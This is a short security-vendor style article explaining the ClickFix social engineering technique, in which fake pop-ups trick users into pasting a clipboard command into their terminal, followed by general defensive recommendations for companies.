Thought Leadership
ClickFix is already being used by a number of nation-state actors such as APT 28 and Kimsuky. The distribution of stealer malware such as Lumma Stealer via the social engineering campaign is particularly popular.
The operators trick users into executing malicious code on their systems. The attackers lure their victims to seemingly legitimate but compromised websites where deceptively genuine-looking pop-ups appear. These pop-ups prompt users to click on buttons labeled “Fix” or “I’m not a robot”. Once clicked, a command is automatically copied to the user’s clipboard and the user is tricked into manually copying and pasting it into their system terminal.
This technique was first discovered in mid-2024 and has been used more and more frequently since then. In addition to phishing, malvertising and SEO poisoning have also been observed as distribution techniques.
The following tips are intended to help those responsible for security to recognize and rectify the problem:
ClickFix campaigns rely heavily on social engineering techniques such as phishing. The aim is to entice users to go to websites that download malicious software. Therefore, companies need to emphasize regular employee training that focuses on recognizing and responding to threats such as phishing. In addition, companies should have a procedure in place for employees who suspect they have been the victim of a phishing attack. This should include reporting to the relevant authorities and taking immediate action to contain the incident and minimize potential damage.
Companies should apply a “defense-in-depth” strategy to create robust security. This includes multiple independent security controls such as EDR, SIEM, network segmentation, identity and access management, and email/web filtering across the entire infrastructure. This multi-layered approach helps to detect and neutralize threats early, minimizing the potential damage.
Logging, asset visibility and continuous monitoring of systems are essential to detect and respond to threats like ClickFix. These features provide a holistic view of the network and make it easier to identify anomalies that may signal an impending attack. Consistent monitoring of endpoint and network traffic can help detect suspicious behavior.
Companies must have a well-defined incident response plan to ensure that they can respond quickly and effectively to security incidents. It is equally important to conduct regular security incident response drills. These exercises help to identify gaps in the response strategy and empower users in recognizing and responding correctly.
